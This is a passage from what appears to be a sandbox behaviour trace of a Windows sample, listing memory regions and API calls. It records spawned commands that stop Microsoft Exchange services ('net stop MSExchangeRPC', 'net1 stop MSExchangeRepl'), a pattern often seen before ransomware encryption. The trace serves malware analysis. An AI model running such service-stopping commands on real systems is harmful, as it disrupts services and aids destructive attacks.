"c:\\windows\\system32\\locale.nls") Region: id = 11627 start_va = 0x5180000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x0000000005180000" filename = "" Region: id = 11628 start_va = 0x5480000 end_va = 0x548ffff entry_point = 0x0 region_type = private name = "private_0x0000000005480000" filename = "" Region: id = 11629 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 11630 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 11631 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 11632 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 11633 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 11634 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 11635 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 11636 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 11637 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 11638 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 11639 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 11640 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11641 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 11642 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11643 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11644 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 11645 start_va = 0x7e800000 end_va = 0x7e8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e800000" filename = "" Region: id = 11646 start_va = 0x7e927000 end_va = 0x7e929fff entry_point = 0x0 region_type = private name = "private_0x000000007e927000" filename = "" Region: id = 11647 start_va = 0xeb0000 end_va = 0xeb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 11648 start_va = 0x1010000 end_va = 0x1012fff entry_point = 0x1010000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 11649 start_va = 0x1020000 end_va = 0x1051fff entry_point = 0x1020000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 711 os_tid = 0xd08 [0139.371] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0139.371] __set_app_type (_Type=0x1) [0139.371] __p__fmode () returned 0x77ac4d6c [0139.371] __p__commode () returned 0x77ac5b1c [0139.371] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0139.372] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0139.372] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.372] GetConsoleOutputCP () returned 0x1b5 [0139.372] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0139.372] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.374] sprintf_s (in: _DstBuf=0xf9fd68, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0139.375] setlocale (category=0, locale=".437") returned="English_United States.437" [0139.376] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0139.376] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0139.376] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeRepl" [0139.376] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xf9fb10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0139.376] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xf9fb04 | out: Buffer=0xf9fb04*=0x5247f68) returned 0x0 [0139.376] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xf9fb08 | out: Buffer=0xf9fb08*=0x5247f80) returned 0x0 [0139.376] __iob_func () returned 0x77ac1208 [0139.376] _fileno (_File=0x77ac1208) returned 0 [0139.376] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0139.376] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0139.376] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0139.376] _wcsicmp (_String1="config", _String2="stop") returned -16 [0139.376] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0139.376] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0139.376] _wcsicmp (_String1="file", _String2="stop") returned -13 [0139.376] _wcsicmp (_String1="files", _String2="stop") returned -13 [0139.376] _wcsicmp (_String1="group", _String2="stop") returned -12 [0139.376] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0139.376] _wcsicmp (_String1="help", _String2="stop") returned -11 [0139.376] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0139.376] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0139.376] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0139.376] _wcsicmp (_String1="session", _String2="stop") returned -15 [0139.376] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0139.376] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0139.376] _wcsicmp (_String1="share", _String2="stop") returned -12 [0139.376] _wcsicmp (_String1="start", _String2="stop") returned -14 [0139.376] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0139.376] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0139.376] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0139.376] _wcsicmp (_String1="accounts", _String2="MSExchangeRepl") returned -12 [0139.376] _wcsicmp (_String1="computer", _String2="MSExchangeRepl") returned -10 [0139.376] _wcsicmp (_String1="config", _String2="MSExchangeRepl") returned -10 [0139.376] _wcsicmp (_String1="continue", _String2="MSExchangeRepl") returned -10 [0139.376] _wcsicmp (_String1="cont", _String2="MSExchangeRepl") returned -10 [0139.376] _wcsicmp (_String1="file", _String2="MSExchangeRepl") returned -7 [0139.377] _wcsicmp (_String1="files", _String2="MSExchangeRepl") returned -7 [0139.377] _wcsicmp (_String1="group", _String2="MSExchangeRepl") returned -6 [0139.377] _wcsicmp (_String1="groups", _String2="MSExchangeRepl") returned -6 [0139.377] _wcsicmp (_String1="help", _String2="MSExchangeRepl") returned -5 [0139.377] _wcsicmp (_String1="helpmsg", _String2="MSExchangeRepl") returned -5 [0139.377] _wcsicmp (_String1="localgroup", _String2="MSExchangeRepl") returned -1 [0139.377] _wcsicmp (_String1="pause", _String2="MSExchangeRepl") returned 3 [0139.377] _wcsicmp (_String1="session", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="sessions", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="sess", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="share", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="start", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="stats", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="statistics", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="stop", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="time", _String2="MSExchangeRepl") returned 7 [0139.377] _wcsicmp (_String1="user", _String2="MSExchangeRepl") returned 8 [0139.377] _wcsicmp (_String1="users", _String2="MSExchangeRepl") returned 8 [0139.377] _wcsicmp (_String1="msg", _String2="MSExchangeRepl") returned 2 [0139.377] _wcsicmp (_String1="messenger", _String2="MSExchangeRepl") returned -14 [0139.377] _wcsicmp (_String1="receiver", _String2="MSExchangeRepl") returned 5 [0139.377] _wcsicmp (_String1="rcv", _String2="MSExchangeRepl") returned 5 [0139.377] _wcsicmp (_String1="netpopup", _String2="MSExchangeRepl") returned 1 [0139.377] _wcsicmp (_String1="redirector", _String2="MSExchangeRepl") returned 5 [0139.377] _wcsicmp (_String1="redir", _String2="MSExchangeRepl") returned 5 [0139.377] _wcsicmp (_String1="rdr", _String2="MSExchangeRepl") returned 5 [0139.377] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeRepl") returned 10 [0139.377] _wcsicmp (_String1="work", _String2="MSExchangeRepl") returned 10 [0139.377] _wcsicmp (_String1="wksta", _String2="MSExchangeRepl") returned 10 [0139.377] _wcsicmp (_String1="prdr", _String2="MSExchangeRepl") returned 3 [0139.377] _wcsicmp (_String1="devrdr", _String2="MSExchangeRepl") returned -9 [0139.377] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeRepl") returned -1 [0139.377] _wcsicmp (_String1="server", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="svr", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="srv", _String2="MSExchangeRepl") returned 6 [0139.377] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeRepl") returned -1 [0139.377] _wcsicmp (_String1="alerter", _String2="MSExchangeRepl") returned -12 [0139.377] _wcsicmp (_String1="netlogon", _String2="MSExchangeRepl") returned 1 [0139.377] _wcsupr (in: _String="MSExchangeRepl" | out: _String="MSEXCHANGEREPL") returned="MSEXCHANGEREPL" [0139.377] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5242630 [0139.379] GetServiceKeyNameW (in: hSCManager=0x5242630, lpDisplayName="MSEXCHANGEREPL", lpServiceName=0x10a8cb0, lpcchBuffer=0xf9fa7c | out: lpServiceName="", lpcchBuffer=0xf9fa7c) returned 0 [0139.380] _wcsicmp (_String1="msg", _String2="MSEXCHANGEREPL") returned 2 [0139.380] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEREPL") returned -14 [0139.380] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEREPL") returned 5 [0139.380] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEREPL") returned 5 [0139.380] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEREPL") returned 5 [0139.380] _wcsicmp (_String1="redir", _String2="MSEXCHANGEREPL") returned 5 [0139.380] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEREPL") returned 5 [0139.380] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEREPL") returned 10 [0139.380] _wcsicmp (_String1="work", _String2="MSEXCHANGEREPL") returned 10 [0139.380] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEREPL") returned 10 [0139.380] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEREPL") returned 3 [0139.380] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEREPL") returned -9 [0139.380] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEREPL") returned -1 [0139.380] _wcsicmp (_String1="server", _String2="MSEXCHANGEREPL") returned 6 [0139.380] _wcsicmp (_String1="svr", _String2="MSEXCHANGEREPL") returned 6 [0139.380] _wcsicmp (_String1="srv", _String2="MSEXCHANGEREPL") returned 6 [0139.380] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEREPL") returned -1 [0139.380] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEREPL") returned -12 [0139.380] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEREPL") returned 1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="WORKSTATION") returned -10 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="LanmanWorkstation") returned 1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="SERVER") returned -6 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="LanmanServer") returned 1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="BROWSER") returned 11 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="BROWSER") returned 11 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="MESSENGER") returned 14 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="MESSENGER") returned 14 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="NETRUN") returned -1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="NETRUN") returned -1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="SPOOLER") returned -6 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="SPOOLER") returned -6 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="ALERTER") returned 12 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="ALERTER") returned 12 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="NETLOGON") returned -1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="NETLOGON") returned -1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="NETPOPUP") returned -1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="NETPOPUP") returned -1 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="SQLSERVER") returned -6 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="SQLSERVER") returned -6 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="REPLICATOR") returned -5 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="REPLICATOR") returned -5 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="REMOTEBOOT") returned -5 [0139.380] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="REMOTEBOOT") returned -5 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="TIMESOURCE") returned -7 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="TIMESOURCE") returned -7 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="AFP") returned 12 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="AFP") returned 12 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="UPS") returned -8 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="UPS") returned -8 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="XACTSRV") returned -11 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="XACTSRV") returned -11 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="TCPIP") returned -7 [0139.381] _wcsicmp (_String1="MSEXCHANGEREPL", _String2="TCPIP") returned -7 [0139.381] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5243758 [0139.381] OpenServiceW (hSCManager=0x5243758, lpServiceName="MSEXCHANGEREPL", dwDesiredAccess=0x84) returned 0x0 [0139.381] GetLastError () returned 0x424 [0139.381] CloseServiceHandle (hSCObject=0x5243758) returned 1 [0139.381] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0139.381] LoadLibraryW (lpLibFileName="NETMSG") returned 0x1010000 [0139.382] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x1010000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0139.383] GetFileType (hFile=0x40) returned 0x2 [0139.383] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf9f918 | out: lpMode=0xf9f918) returned 1 [0139.384] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xf9f924, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xf9f924*=0x1e) returned 1 [0139.384] GetFileType (hFile=0x40) returned 0x2 [0139.384] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf9f918 | out: lpMode=0xf9f918) returned 1 [0139.384] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xf9f924, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xf9f924*=0x2) returned 1 [0139.384] _ultow (in: _Dest=0x889, _Radix=16382264 | out: _Dest=0x889) returned="2185" [0139.384] FormatMessageW (in: dwFlags=0x2800, lpSource=0x1010000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0139.384] GetFileType (hFile=0x40) returned 0x2 [0139.384] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf9f908 | out: lpMode=0xf9f908) returned 1 [0139.385] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xf9f914, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xf9f914*=0x34) returned 1 [0139.385] GetFileType (hFile=0x40) returned 0x2 [0139.385] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf9f908 | out: lpMode=0xf9f908) returned 1 [0139.385] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xf9f914, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xf9f914*=0x2) returned 1 [0139.385] NetApiBufferFree (Buffer=0x5247f68) returned 0x0 [0139.385] NetApiBufferFree (Buffer=0x5247f80) returned 0x0 [0139.385] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeRepl" [0139.385] exit (_Code=2) Thread: id = 712 os_tid = 0xca0 Process: id = "241" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2a16c000" os_pid = "0xc9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeRPC" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11650 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 11651 start_va = 0x4d0000 end_va = 0x44cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 11652 start_va = 0x44d0000 end_va = 0x44effff entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 11653 start_va = 0x44f0000 end_va = 0x44f0fff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 11654 start_va = 0x4500000 end_va = 0x4513fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004500000" filename = "" Region: id = 11655 start_va = 0x4520000 end_va = 0x455ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 11656 start_va = 0x4560000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 11657 start_va = 0x4660000 end_va = 0x4663fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004660000" filename = "" Region: id = 11658 start_va = 0x4670000 end_va = 0x4670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004670000" filename = "" Region: id = 11659 start_va = 0x4680000 end_va = 0x4681fff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 11660 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11661 start_va = 0x7ea30000 end_va = 0x7ea52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea30000" filename = "" Region: id = 11662 start_va = 0x7ea53000 end_va = 0x7ea53fff entry_point = 0x0 region_type = private name = "private_0x000000007ea53000" filename = "" Region: id = 11663 start_va = 0x7ea56000 end_va = 0x7ea56fff entry_point = 0x0 region_type = private name = "private_0x000000007ea56000" filename = "" Region: id = 11664 start_va = 0x7ea5d000 end_va = 0x7ea5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea5d000" filename = "" Region: id = 11665 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11666 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11667 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11668 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11669 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11670 start_va = 0x46b0000 end_va = 0x46bffff entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 11671 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11672 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11673 start_va = 0x4750000 end_va = 0x484ffff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 11674 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11715 start_va = 0x44d0000 end_va = 0x44dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 11716 start_va = 0x46c0000 end_va = 0x46fffff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 11717 start_va = 0x4850000 end_va = 0x490dfff entry_point = 0x4850000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11718 start_va = 0x4910000 end_va = 0x4a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 11719 start_va = 0x4b00000 end_va = 0x4b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 11720 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11721 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11722 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11723 start_va = 0x7e930000 end_va = 0x7ea2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e930000" filename = "" Region: id = 11724 start_va = 0x7ea5a000 end_va = 0x7ea5cfff entry_point = 0x0 region_type = private name = "private_0x000000007ea5a000" filename = "" Region: id = 11725 start_va = 0x44e0000 end_va = 0x44e3fff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 11726 start_va = 0x44f0000 end_va = 0x44f3fff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 11727 start_va = 0x4b10000 end_va = 0x4e46fff entry_point = 0x4b10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 713 os_tid = 0xd00 [0139.535] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0139.535] __set_app_type (_Type=0x1) [0139.535] __p__fmode () returned 0x77ac4d6c [0139.535] __p__commode () returned 0x77ac5b1c [0139.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0139.535] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0139.536] GetCurrentThreadId () returned 0xd00 [0139.536] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd00) returned 0x84 [0139.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0139.536] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0139.536] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.538] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.538] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x465fd54 | out: phkResult=0x465fd54*=0x0) returned 0x2 [0139.538] VirtualQuery (in: lpAddress=0x465fd5b, lpBuffer=0x465fd0c, dwLength=0x1c | out: lpBuffer=0x465fd0c*(BaseAddress=0x465f000, 